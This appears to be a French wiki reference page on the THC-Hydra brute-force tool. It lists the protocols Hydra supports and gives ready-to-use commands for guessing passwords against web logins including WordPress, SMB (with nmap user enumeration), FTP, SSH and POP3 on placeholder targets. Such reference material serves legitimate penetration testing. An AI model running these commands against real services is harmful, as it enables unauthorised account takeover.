Hydra
| Fiche express | |
|---|---|
| Domaine | Bruteforce d'authentification réseau (en ligne) |
| Type | Cracker multi-protocoles |
| Interface graphique | xhydra |
| Source | thc.org/thc-hydra |
| Voir aussi | Medusa · Patator · Wordlist |
THC-Hydra (souvent appelé simplement Hydra) est un outil de bruteforce d'authentification en ligne : contrairement à Hashcat ou John the ripper qui cassent un hash hors-ligne, Hydra teste directement des couples identifiant/mot de passe contre le service cible — plus lent et plus détectable, mais utilisable même quand aucun hash n'est récupérable. Une interface graphique existe, xhydra.
Protocoles supportés
AFP, Cisco AAA/auth/enable, CVS, Firebird, FTP, HTTP-{FORM,GET,HEAD,PROXY}-{GET,POST}, HTTPS variantes, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NCP, NNTP, Oracle (Listener/SID/auth), PC-Anywhere, PCNFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP (+ Enum), SNMP, SOCKS5, SSH (v1/v2), Subversion, Teamspeak, Telnet, VMware-Auth, VNC, XMPP.
Usage
HTTP GET
hydra -l admin -P /usr/share/wordlists/darkc0de.lst -e nsr -f -4 192.168.0.1 http-get http://192.168.0.1/
HTTP HEAD
hydra -L userlist.txt -P wordlist.txt cible.example.com https-head /admin/
HTTP POST (formulaire web)
hydra -l admin -P wordlist.txt cible.example.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Incorrect" -t 4
SMB (avec récupération de la liste d'utilisateurs via nmap)
nmap --script=smb-enum-users 192.168.0.3 -p 445 | perl -le 'while(<STDIN>){if(/^.*?\\(\w+)\s+.*/){print "$1";}}' >> userlist.txt
hydra -L userlist.txt -P wordlist.txt 192.168.0.3 smb
FTP
hydra -L userlist.txt -P wordlist.txt ftp.cible.example.com ftp -f
SSH
hydra -l root -P wordlist.txt ssh://cible.example.com -V
POP3
hydra -l root -P wordlist.txt pop3://cible.example.com -V
(la source historique de cette page indiquait par erreur un schéma ftp:// pour cet exemple POP3 — corrigé ici)
Voir aussi
- Medusa — alternative directe, mêmes principes
- Patator — framework de bruteforce plus flexible sur les conditions de succès/échec
- Wordlist — dictionnaires utilisés en attaque
- John the ripper — cassage hors-ligne quand un hash est récupérable